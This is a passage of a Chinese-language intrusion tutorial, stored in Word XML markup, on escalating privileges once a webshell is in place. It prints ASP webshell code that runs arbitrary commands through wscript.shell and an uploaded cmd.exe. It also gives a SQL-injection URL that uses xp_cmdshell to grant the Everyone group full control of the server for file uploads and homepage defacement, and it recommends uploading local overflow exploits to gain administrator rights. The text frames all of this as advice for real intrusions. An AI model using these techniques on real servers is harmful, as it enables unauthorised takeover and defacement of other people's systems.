      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>st\web1.rar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>d:\web\test\web1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Response.Write SI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>End Function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们把它修改成以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Function CmdShell()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>If Request("cmd")&lt;&gt;"" Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>DefCmd = Request("cmd")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>DefCmd = "Dir "&amp;Session("FolderPath")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI=" "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI=SI&amp;""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI=SI&amp;""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>&lt;br&gt;　SI=SI&amp;server.createobject("wscript.shell").exec("上传的cmd.exe绝对路径 /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>c "&amp;DefCmd).stdout.readall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>&lt;br&gt;　SI=SI&amp;Chr(13)&amp;"Rar 命令行压缩示例：c:\progra~1\winrar\rar.exe a d:\web\te</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>st\web1.rar d:\web\test\web1 "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Response.Write SI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>End Function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="00433507" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了看</w:t>
      </w:r>
      <w:r w:rsidR="006B304D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得清楚把要修改的提出来就可以</w:t>
      </w:r>
      <w:r w:rsidR="00594C82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006B304D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原来的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>_code cellSpacing=1 cellPadding=0 width="90%" border=0&gt; SI=SI&amp;server.createobje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>("wscript.shell").exec("cmd.exe /c "&amp;DefCmd).stdout.readall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改成：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI=SI&amp;server.createobject("wscript.shell").exec("上传的 cmd.exe 绝对路径 /c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>"&amp;DefCmd).stdout.readall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="00433507" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidR="006B304D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传到的目录是</w:t>
      </w:r>
      <w:r w:rsidR="006B304D">
        <w:t xml:space="preserve"> D:\web\www\cmd.exe 那么就修改成:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>_code cellSpacing=1 cellPadding=0 width="90%" border=0&gt; SI=SI&amp;server.createobje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>ct("wscript.shell").exec("D:\web\www\cmd.exe /c "&amp;DefCmd).stdout.readall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="00433507" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么这样</w:t>
      </w:r>
      <w:r w:rsidR="006B304D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以执行各种命令了，比如添加一个管理员等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067292" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>(7)、这种方法适合于后台数据库是</w:t>
      </w:r>
      <w:r w:rsidR="00067292">
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r w:rsidR="00A6367F">
        <w:t>的情况，</w:t>
      </w:r>
      <w:r>
        <w:t>要用到</w:t>
      </w:r>
      <w:r w:rsidR="00067292">
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>的cacls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>xp_cmdshell。可以提交:http://www.xxx.com/xxx.asp?id=xx;exec master.dbo.xp_cmd</w:t>
      </w:r>
      <w:r w:rsidR="00067292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>shell 'cacls d:\home /t /e /c /g everyone:f';--这样赋予了操作系统中</w:t>
      </w:r>
      <w:r w:rsidR="00067292">
        <w:t>everyone</w:t>
      </w:r>
      <w:r>
        <w:t>组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的成员所有的权限</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A6367F">
        <w:t>然后就可以上传文件、改</w:t>
      </w:r>
      <w:r>
        <w:t>主页了!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067292" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>(8)、利用本地溢出程序进行提权。在得到</w:t>
      </w:r>
      <w:r w:rsidR="00067292">
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00A6367F">
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:t>先查看服务器上哪些目录是可</w:t>
      </w:r>
      <w:r w:rsidR="00B2194F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的，然后再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找操作</w:t>
      </w:r>
      <w:r w:rsidR="00B2194F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的版本以及在服务器上安装了哪些软件。在确定了这些信息后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就查找这些软件存在的相应的一些溢出程序，并上传到服务器的可执行目录</w:t>
      </w:r>
      <w:r w:rsidR="00B2194F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，接着溢出，成功的话，一下就可以得到管理员的权限。这种方法是最为强烈推荐的，不管它是哪种操作系统，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要确定其操作系统或安装的软件中有存在溢出漏洞，那么使用溢出程序溢出是最快得到管理员权限的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067292" w:rsidRDefault="00067292" w:rsidP="006B304D"/>
    <w:p w:rsidR="00DE42CF" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实</w:t>
      </w:r>
      <w:r w:rsidR="00DE42CF">
        <w:t>webshell的提权的方法还有非常多，这里只</w:t>
      </w:r>
      <w:r w:rsidR="00DE42CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>简单几种。方法的种类虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多，但是他们都是为了达到可以执行相应程序、命令，进而得到更高权限的目的。所以</w:t>
      </w:r>
      <w:r w:rsidR="00DE42CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法虽然多，可它的核心变不了，提权方法与技巧终究还是如此。不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是推荐使用溢出来提权这种方法。要使</w:t>
      </w:r>
      <w:r w:rsidR="00DE42CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用这种方法需要做两个方面的工作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE42CF" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、得到一个可以执行的目录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE42CF" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、确定操作系统和其安装的软件中那个存在溢出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F1E81" w:rsidRPr="000F1E81" w:rsidRDefault="00DE42CF" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至于更多的技巧与方法就要靠平时入侵的过程不断的积累，从实战中获得经验。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000F1E81" w:rsidRPr="000F1E81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37" w:rsidRDefault="009E0C37" w:rsidP="000A0E66">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009E0C37" w:rsidRDefault="009E0C37" w:rsidP="000A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37" w:rsidRDefault="009E0C37" w:rsidP="000A0E66">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009E0C37" w:rsidRDefault="009E0C37" w:rsidP="000A0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93"/>
    <w:rsid w:val="00067292"/>
    <w:rsid w:val="000A0E66"/>
    <w:rsid w:val="000C743E"/>
    <w:rsid w:val="000F1E81"/>
    <w:rsid w:val="00204886"/>
    <w:rsid w:val="00220BFE"/>
    <w:rsid w:val="002B7A3C"/>
    <w:rsid w:val="003203B1"/>
    <w:rsid w:val="00376A93"/>
    <w:rsid w:val="0039628E"/>
    <w:rsid w:val="003C7D29"/>
    <w:rsid w:val="003E1E9A"/>
    <w:rsid w:val="0041561B"/>
    <w:rsid w:val="00433507"/>
    <w:rsid w:val="004A0AC8"/>
    <w:rsid w:val="004B4FED"/>
    <w:rsid w:val="004F14E9"/>
    <w:rsid w:val="004F4383"/>
    <w:rsid w:val="0052328D"/>
    <w:rsid w:val="005336FC"/>
    <w:rsid w:val="00594C82"/>
    <w:rsid w:val="006B304D"/>
    <w:rsid w:val="00700103"/>
    <w:rsid w:val="007577A9"/>
    <w:rsid w:val="0081661F"/>
    <w:rsid w:val="00863BF2"/>
    <w:rsid w:val="0095361C"/>
    <w:rsid w:val="00973655"/>
    <w:rsid w:val="009E0C37"/>
    <w:rsid w:val="00A02F62"/>
    <w:rsid w:val="00A6367F"/>
    <w:rsid w:val="00B07456"/>
    <w:rsid w:val="00B2194F"/>
    <w:rsid w:val="00C16D1F"/>
    <w:rsid w:val="00D01EC8"/>
    <w:rsid w:val="00D62F35"/>
    <w:rsid w:val="00DE42CF"/>
    <w:rsid w:val="00EC22DD"/>
    <w:rsid w:val="00F076D4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67BFDBD-83FE-4224-8531-7C5327BA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E66"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005336F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B7A3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3203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%20sentence%20Trojan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国阳</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LGY</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-12T13:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-16T17:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>